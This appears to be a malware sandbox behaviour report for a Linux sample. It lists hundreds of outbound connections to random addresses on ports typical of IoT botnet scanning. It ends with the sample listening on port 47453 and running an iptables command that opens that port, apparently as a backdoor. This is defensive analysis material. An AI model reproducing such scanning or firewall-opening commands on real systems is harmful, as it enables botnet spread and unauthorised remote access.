Source: global traffic TCP traffic: 192.168.2.20:44354 -> 14.6.225.98:7574
Source: global traffic TCP traffic: 192.168.2.20:52364 -> 108.221.87.254:37215
Source: global traffic TCP traffic: 192.168.2.20:48882 -> 155.116.23.175:52869
Source: global traffic TCP traffic: 192.168.2.20:45642 -> 96.137.22.200:7574
Source: global traffic TCP traffic: 192.168.2.20:36158 -> 70.170.178.192:37215
Source: global traffic TCP traffic: 192.168.2.20:45870 -> 59.167.100.92:8443
Source: global traffic TCP traffic: 192.168.2.20:42284 -> 28.65.109.23:8443
Source: global traffic TCP traffic: 192.168.2.20:46744 -> 74.69.135.216:52869
Source: global traffic TCP traffic: 192.168.2.20:56872 -> 1.18.146.134:49152
Source: global traffic TCP traffic: 192.168.2.20:44338 -> 145.249.112.110:37215
Source: global traffic TCP traffic: 192.168.2.20:34220 -> 182.112.56.21:37215
Source: global traffic TCP traffic: 192.168.2.20:40646 -> 45.228.110.91:8080
Source: global traffic TCP traffic: 192.168.2.20:40778 -> 167.154.0.215:81
Source: global traffic TCP traffic: 192.168.2.20:50098 -> 109.162.104.119:8080
Source: global traffic TCP traffic: 192.168.2.20:59850 -> 6.117.24.0:8080
Source: global traffic TCP traffic: 192.168.2.20:59852 -> 148.98.127.31:7574
Source: global traffic TCP traffic: 192.168.2.20:50362 -> 213.131.147.141:8443
Source: global traffic TCP traffic: 192.168.2.20:60932 -> 22.225.214.100:5555
Source: global traffic TCP traffic: 192.168.2.20:58072 -> 19.139.235.199:49152
Source: global traffic TCP traffic: 192.168.2.20:36030 -> 174.201.122.204:8443
Source: global traffic TCP traffic: 192.168.2.20:42960 -> 156.249.53.230:52869
Source: global traffic TCP traffic: 192.168.2.20:46104 -> 11.48.52.253:52869
Source: global traffic TCP traffic: 192.168.2.20:46822 -> 86.114.25.82:8080
Source: global traffic TCP traffic: 192.168.2.20:51544 -> 216.111.216.82:37215
Source: global traffic TCP traffic: 192.168.2.20:38618 -> 17.164.29.91:52869
Source: global traffic TCP traffic: 192.168.2.20:42904 -> 45.234.221.196:5555
Source: global traffic TCP traffic: 192.168.2.20:33222 -> 66.232.73.239:5555
Source: global traffic TCP traffic: 192.168.2.20:45572 -> 59.19.242.88:8080
Source: global traffic TCP traffic: 192.168.2.20:37966 -> 91.180.74.171:49152
Source: global traffic TCP traffic: 192.168.2.20:34904 -> 131.16.172.129:5555
Source: global traffic TCP traffic: 192.168.2.20:48872 -> 72.242.88.155:81
Source: global traffic TCP traffic: 192.168.2.20:54330 -> 156.194.253.153:37215
Source: global traffic TCP traffic: 192.168.2.20:57496 -> 33.91.25.116:81
Source: global traffic TCP traffic: 192.168.2.20:57568 -> 169.134.101.55:49152
Source: global traffic TCP traffic: 192.168.2.20:47480 -> 110.10.168.48:5555
Source: global traffic TCP traffic: 192.168.2.20:43214 -> 171.5.81.156:8080
Source: global traffic TCP traffic: 192.168.2.20:58042 -> 68.163.230.108:52869
Source: global traffic TCP traffic: 192.168.2.20:60804 -> 210.219.207.3:8080
Source: global traffic TCP traffic: 192.168.2.20:52896 -> 213.58.83.64:81
Source: global traffic TCP traffic: 192.168.2.20:35732 -> 125.234.106.133:8080
Source: global traffic TCP traffic: 192.168.2.20:38762 -> 182.149.146.177:8080
Source: global traffic TCP traffic: 192.168.2.20:49036 -> 138.7.161.211:52869
Source: global traffic TCP traffic: 192.168.2.20:47654 -> 109.61.100.248:8080
Source: global traffic TCP traffic: 192.168.2.20:58694 -> 94.166.64.10:5555
Source: global traffic TCP traffic: 192.168.2.20:48986 -> 163.70.83.83:8080
Source: global traffic TCP traffic: 192.168.2.20:43100 -> 183.250.239.211:8080
Source: global traffic TCP traffic: 192.168.2.20:37622 -> 33.54.67.97:8080
Source: global traffic TCP traffic: 192.168.2.20:55968 -> 84.62.5.182:8443
Source: global traffic TCP traffic: 192.168.2.20:46258 -> 116.147.238.153:37215
Source: global traffic TCP traffic: 192.168.2.20:34866 -> 6.232.250.250:8080
Source: global traffic TCP traffic: 192.168.2.20:33864 -> 1.5.148.231:8080
Source: global traffic TCP traffic: 192.168.2.20:39298 -> 55.77.192.67:8443
Source: global traffic TCP traffic: 192.168.2.20:34300 -> 220.89.101.239:8443
Source: global traffic TCP traffic: 192.168.2.20:52116 -> 187.133.162.42:5555
Source: global traffic TCP traffic: 192.168.2.20:34318 -> 105.202.244.96:7574
Source: global traffic TCP traffic: 192.168.2.20:43462 -> 103.16.83.23:7574
Source: global traffic TCP traffic: 192.168.2.20:33290 -> 153.153.124.97:8080
Source: global traffic TCP traffic: 192.168.2.20:57636 -> 137.8.108.189:5555
Source: global traffic TCP traffic: 192.168.2.20:59940 -> 77.186.145.187:5555
Source: global traffic TCP traffic: 192.168.2.20:42288 -> 16.119.106.89:8080
Source: global traffic TCP traffic: 192.168.2.20:47410 -> 77.137.8.165:8080
Source: global traffic TCP traffic: 192.168.2.20:36216 -> 42.241.34.105:8080
Source: global traffic TCP traffic: 192.168.2.20:40810 -> 183.238.2.60:81
Source: global traffic TCP traffic: 192.168.2.20:56094 -> 165.40.111.59:52869
Source: global traffic TCP traffic: 192.168.2.20:54388 -> 211.72.191.195:8080
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 203.204.92.244:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 76.179.94.31:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 47.178.77.204:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 121.121.241.203:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 85.26.236.253:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 160.221.21.0:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 53.184.19.200:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 198.9.196.56:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 85.221.238.78:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 143.1.224.175:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 171.153.71.56:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 174.51.201.83:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 13.163.7.33:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 203.223.110.147:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 136.38.16.27:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 47.254.200.229:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 190.227.232.240:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 79.37.180.218:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 46.200.62.22:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 73.9.241.254:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 177.176.214.85:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 156.167.89.28:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 211.166.254.195:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 66.218.10.63:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 139.151.132.72:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 217.50.165.81:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 75.82.144.224:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 135.140.27.106:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 212.63.97.36:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 205.162.45.253:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 213.252.178.60:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 48.56.36.74:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 71.38.218.33:2323
Source: global traffic TCP traffic: 192.168.2.20:33868 -> 146.244.33.196:8080
Source: global traffic TCP traffic: 192.168.2.20:57874 -> 131.7.179.240:8080
Source: global traffic TCP traffic: 192.168.2.20:54196 -> 41.64.118.236:8080
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 188.176.86.229:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 212.167.165.252:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 122.243.242.25:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 111.0.125.36:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 185.50.62.97:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 59.172.13.97:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 188.200.140.122:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 115.42.52.37:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 183.16.231.232:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 206.17.179.29:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 112.254.112.252:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 174.47.48.224:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 66.178.106.107:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 88.38.36.48:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 207.253.148.221:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 63.43.183.132:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 76.81.222.62:2323
Source: global traffic TCP traffic: 192.168.2.20:35476 -> 220.165.204.143:8080
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 158.101.147.68:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 36.47.126.190:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 163.68.243.17:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 87.254.248.72:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 104.46.233.185:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 38.8.33.243:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 75.210.106.74:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 202.213.251.249:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 190.178.70.246:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 135.158.105.90:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 193.73.223.232:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 119.91.55.78:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 186.19.26.160:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 95.196.154.222:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 197.185.25.16:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 202.65.105.27:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 32.153.134.237:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 193.238.117.21:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 89.27.104.84:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 135.175.116.15:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 53.252.135.112:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 148.42.51.67:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 220.187.21.100:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 75.196.238.210:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 88.220.144.120:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 36.139.136.230:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 86.106.153.130:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 187.196.99.229:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 121.130.64.26:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 101.183.25.205:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 53.164.22.0:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 110.62.230.0:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 133.137.4.253:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 183.168.194.168:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 32.243.64.41:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 126.3.149.148:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 163.166.58.36:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 24.240.185.140:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 61.199.114.26:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 20.211.166.14:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 27.207.136.28:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 120.34.226.148:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 61.61.71.43:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 82.89.10.174:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 141.34.29.8:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 19.224.224.230:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 13.185.66.112:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 168.75.205.4:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 173.115.134.194:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 213.125.161.32:2323
Source: global traffic TCP traffic: 192.168.2.20:35492 -> 5.187.144.78:7574
Source: global traffic TCP traffic: 192.168.2.20:37100 -> 190.206.177.195:7574
Source: global traffic TCP traffic: 192.168.2.20:58838 -> 60.182.4.178:49152
Source: global traffic TCP traffic: 192.168.2.20:36900 -> 34.226.216.9:52869
Source: global traffic TCP traffic: 192.168.2.20:54874 -> 45.66.168.229:81
Source: global traffic TCP traffic: 192.168.2.20:49722 -> 148.119.94.202:8080
Source: global traffic TCP traffic: 192.168.2.20:60760 -> 124.100.92.68:8080
Source: global traffic TCP traffic: 192.168.2.20:47312 -> 168.144.37.63:7574
Source: global traffic TCP traffic: 192.168.2.20:55472 -> 31.65.174.196:8080
Source: global traffic TCP traffic: 192.168.2.20:59848 -> 179.86.197.224:8443
Source: global traffic TCP traffic: 192.168.2.20:55356 -> 79.74.222.218:8080
Source: global traffic TCP traffic: 192.168.2.20:35232 -> 12.118.224.5:8080
Source: global traffic TCP traffic: 192.168.2.20:49328 -> 194.139.111.238:8080
Source: global traffic TCP traffic: 192.168.2.20:41840 -> 26.34.213.157:49152
Source: global traffic TCP traffic: 192.168.2.20:36462 -> 161.230.34.156:37215
Source: global traffic TCP traffic: 192.168.2.20:37816 -> 37.98.108.113:81
Source: global traffic TCP traffic: 192.168.2.20:39546 -> 158.143.122.210:52869
Source: global traffic TCP traffic: 192.168.2.20:40436 -> 193.36.5.127:49152
Source: global traffic TCP traffic: 192.168.2.20:33418 -> 31.20.82.249:8080
Source: global traffic TCP traffic: 192.168.2.20:35740 -> 161.127.238.198:81
Source: global traffic TCP traffic: 192.168.2.20:50382 -> 136.113.197.35:8443
Source: global traffic TCP traffic: 192.168.2.20:48226 -> 83.41.228.148:8443
Source: global traffic TCP traffic: 192.168.2.20:41260 -> 37.126.224.143:52869
Source: global traffic TCP traffic: 192.168.2.20:53138 -> 101.227.190.33:5555
Source: global traffic TCP traffic: 192.168.2.20:48044 -> 111.240.142.16:7574
Source: global traffic TCP traffic: 192.168.2.20:55242 -> 158.38.176.82:8080
Source: global traffic TCP traffic: 192.168.2.20:58760 -> 140.134.218.225:8080
Source: global traffic TCP traffic: 192.168.2.20:49084 -> 184.61.35.161:5555
Source: global traffic TCP traffic: 192.168.2.20:51112 -> 116.25.201.150:8080
Source: global traffic TCP traffic: 192.168.2.20:59970 -> 196.198.124.215:8443
Source: global traffic TCP traffic: 192.168.2.20:50028 -> 52.16.235.82:8080
Source: global traffic TCP traffic: 192.168.2.20:42628 -> 58.30.72.177:49152
Source: global traffic TCP traffic: 192.168.2.20:35864 -> 173.110.61.196:7574
Source: global traffic TCP traffic: 192.168.2.20:59006 -> 135.4.185.97:8080
Source: global traffic TCP traffic: 192.168.2.20:38830 -> 143.147.160.1:81
Source: global traffic TCP traffic: 192.168.2.20:44456 -> 94.135.178.87:81
Source: global traffic TCP traffic: 192.168.2.20:58872 -> 72.99.199.177:49152
Source: global traffic TCP traffic: 192.168.2.20:58790 -> 151.74.246.170:81
Source: global traffic TCP traffic: 192.168.2.20:55876 -> 78.175.116.20:52869
Source: global traffic TCP traffic: 192.168.2.20:36794 -> 202.81.140.0:81
Source: global traffic TCP traffic: 192.168.2.20:60620 -> 53.134.248.119:52869
Source: global traffic TCP traffic: 192.168.2.20:55554 -> 26.147.179.51:52869
Source: global traffic TCP traffic: 192.168.2.20:54754 -> 176.102.246.130:5555
Source: global traffic TCP traffic: 192.168.2.20:39122 -> 56.151.171.111:8080
Source: global traffic TCP traffic: 192.168.2.20:48678 -> 113.254.69.147:7574
Source: global traffic TCP traffic: 192.168.2.20:48330 -> 206.27.21.74:5555
Source: global traffic TCP traffic: 192.168.2.20:48038 -> 39.252.230.232:8443
Source: global traffic TCP traffic: 192.168.2.20:55860 -> 190.71.92.106:49152
Source: global traffic TCP traffic: 192.168.2.20:43970 -> 149.145.117.99:5555
Source: global traffic TCP traffic: 192.168.2.20:46000 -> 44.188.108.249:8443
Source: global traffic TCP traffic: 192.168.2.20:60688 -> 8.132.20.149:8443
Source: global traffic TCP traffic: 192.168.2.20:35494 -> 74.119.4.125:8443
Source: global traffic TCP traffic: 192.168.2.20:42656 -> 22.158.74.158:5555
Source: global traffic TCP traffic: 192.168.2.20:35660 -> 216.40.146.138:8080
Source: global traffic TCP traffic: 192.168.2.20:58458 -> 126.239.116.72:8080
Source: global traffic TCP traffic: 192.168.2.20:33462 -> 208.33.128.23:8080
Source: global traffic TCP traffic: 192.168.2.20:54130 -> 222.204.252.34:5555
Source: global traffic TCP traffic: 192.168.2.20:51074 -> 44.141.251.112:49152
Source: global traffic TCP traffic: 192.168.2.20:59086 -> 155.192.173.3:49152
Source: global traffic TCP traffic: 192.168.2.20:50826 -> 92.82.252.190:5555
Source: global traffic TCP traffic: 192.168.2.20:46708 -> 34.144.238.160:8080
Source: global traffic TCP traffic: 192.168.2.20:46958 -> 98.137.65.157:52869
Source: global traffic TCP traffic: 192.168.2.20:60756 -> 72.89.219.141:8443
Source: global traffic TCP traffic: 192.168.2.20:36870 -> 216.127.243.47:8080
Source: global traffic TCP traffic: 192.168.2.20:41072 -> 180.119.171.72:5555
Source: global traffic TCP traffic: 192.168.2.20:51280 -> 173.235.230.238:8443
Source: global traffic TCP traffic: 192.168.2.20:47058 -> 207.230.142.20:8080
Source: global traffic TCP traffic: 192.168.2.20:37854 -> 140.64.139.164:8080
Source: global traffic TCP traffic: 192.168.2.20:55376 -> 51.170.75.171:37215
Source: global traffic TCP traffic: 192.168.2.20:45412 -> 200.164.44.27:37215
Source: global traffic TCP traffic: 192.168.2.20:48688 -> 51.238.146.201:81
Source: global traffic TCP traffic: 192.168.2.20:53756 -> 180.176.10.237:81
Source: global traffic TCP traffic: 192.168.2.20:38876 -> 73.43.76.24:5555
Source: global traffic TCP traffic: 192.168.2.20:34170 -> 85.61.49.109:8080
Source: global traffic TCP traffic: 192.168.2.20:58048 -> 19.79.231.29:8080
Source: global traffic TCP traffic: 192.168.2.20:40964 -> 70.113.63.226:8443
Source: global traffic TCP traffic: 192.168.2.20:52226 -> 211.44.209.80:8443
Source: global traffic TCP traffic: 192.168.2.20:49224 -> 157.5.200.51:7574
Source: global traffic TCP traffic: 192.168.2.20:56926 -> 56.179.20.91:49152
Source: global traffic TCP traffic: 192.168.2.20:37358 -> 75.244.195.175:8080
Source: global traffic TCP traffic: 192.168.2.20:42222 -> 71.113.61.118:49152
Source: global traffic TCP traffic: 192.168.2.20:36356 -> 96.105.199.49:7574
Source: global traffic TCP traffic: 192.168.2.20:48666 -> 219.171.175.178:49152
Source: global traffic TCP traffic: 192.168.2.20:48680 -> 152.77.109.165:81
Source: global traffic TCP traffic: 192.168.2.20:49400 -> 120.3.130.253:8443
Source: global traffic TCP traffic: 192.168.2.20:38714 -> 222.35.115.231:52869
Source: global traffic TCP traffic: 192.168.2.20:48808 -> 29.191.42.58:8080
Source: global traffic TCP traffic: 192.168.2.20:60036 -> 93.26.114.163:8080
Source: global traffic TCP traffic: 192.168.2.20:48434 -> 43.76.242.175:8080
Source: global traffic TCP traffic: 192.168.2.20:36502 -> 23.165.91.76:5555
Source: global traffic TCP traffic: 192.168.2.20:58162 -> 42.4.201.2:52869
Source: global traffic TCP traffic: 192.168.2.20:53462 -> 167.243.21.26:7574
Source: global traffic TCP traffic: 192.168.2.20:40934 -> 166.71.33.66:37215
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 126.173.187.250:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 212.251.42.151:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 54.26.235.219:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 115.36.198.11:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 163.136.89.118:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 106.43.189.61:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 39.236.0.254:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 209.120.183.182:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 184.238.11.237:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 9.151.116.206:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 124.181.145.82:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 182.106.163.140:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 90.179.152.71:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 77.253.34.142:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 106.160.177.38:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 83.190.188.81:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 12.199.143.201:2323
Source: global traffic TCP traffic: 192.168.2.20:32920 -> 97.191.181.246:52869
Source: global traffic TCP traffic: 192.168.2.20:35860 -> 67.159.181.184:8080
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 206.165.72.172:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 125.35.75.60:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 187.155.226.130:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 178.123.15.193:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 217.205.168.132:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 101.177.86.6:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 59.66.159.74:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 70.40.129.75:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 178.88.210.245:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 213.48.178.169:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 195.49.212.151:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 27.204.236.161:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 206.39.31.252:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 198.8.107.227:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 114.219.83.119:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 164.147.110.159:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 209.143.229.253:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 104.164.201.197:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 38.155.199.107:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 46.120.23.248:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 182.223.61.33:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 8.198.203.74:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 213.120.220.137:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 193.120.5.123:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 87.78.13.108:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 140.231.227.195:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 170.134.88.147:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 185.120.151.60:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 93.102.109.79:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 190.215.114.237:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 207.17.7.126:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 116.72.59.199:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 76.123.98.28:2323
Source: global traffic TCP traffic: 192.168.2.20:53474 -> 190.126.252.140:52869
Source: global traffic TCP traffic: 192.168.2.20:49638 -> 118.144.15.19:37215
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 179.67.151.112:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 72.214.7.65:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 71.199.207.110:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 191.185.159.193:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 57.124.145.13:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 145.200.155.76:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 34.110.165.234:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 67.241.120.56:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 2.254.169.42:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 145.25.76.245:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 209.162.247.31:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 44.185.101.89:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 189.147.158.128:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 109.181.142.240:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 17.233.5.252:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 36.185.136.86:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 103.115.64.224:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 65.74.248.65:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 119.84.157.150:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 166.102.52.220:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 156.151.56.37:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 9.208.247.147:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 149.52.37.158:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 141.199.106.142:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 176.146.163.79:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 91.191.81.144:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 213.102.196.97:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 102.201.117.82:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 97.107.48.173:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 189.51.27.16:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 188.130.4.252:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 160.94.210.98:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 46.204.100.29:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 87.112.133.194:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 2.95.37.31:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 183.104.203.213:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 123.222.206.245:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 167.76.204.52:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 57.27.248.252:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 36.66.112.200:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 212.89.141.221:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 135.192.171.157:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 23.178.112.227:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 122.83.37.215:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 93.198.168.33:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 83.169.254.83:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 197.49.14.136:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 151.227.168.124:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 68.23.39.237:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 122.145.165.234:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 110.142.83.223:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 196.158.255.105:1023
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 112.102.181.25:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 78.178.152.141:2323
Source: global traffic TCP traffic: 192.168.2.20:44211 -> 123.180.27.243:2323
Sample listens on a socket
Source: /tmp/bin.sh (PID: 6815) Socket: 0.0.0.0::47453 Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 6827) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT Jump to behavior
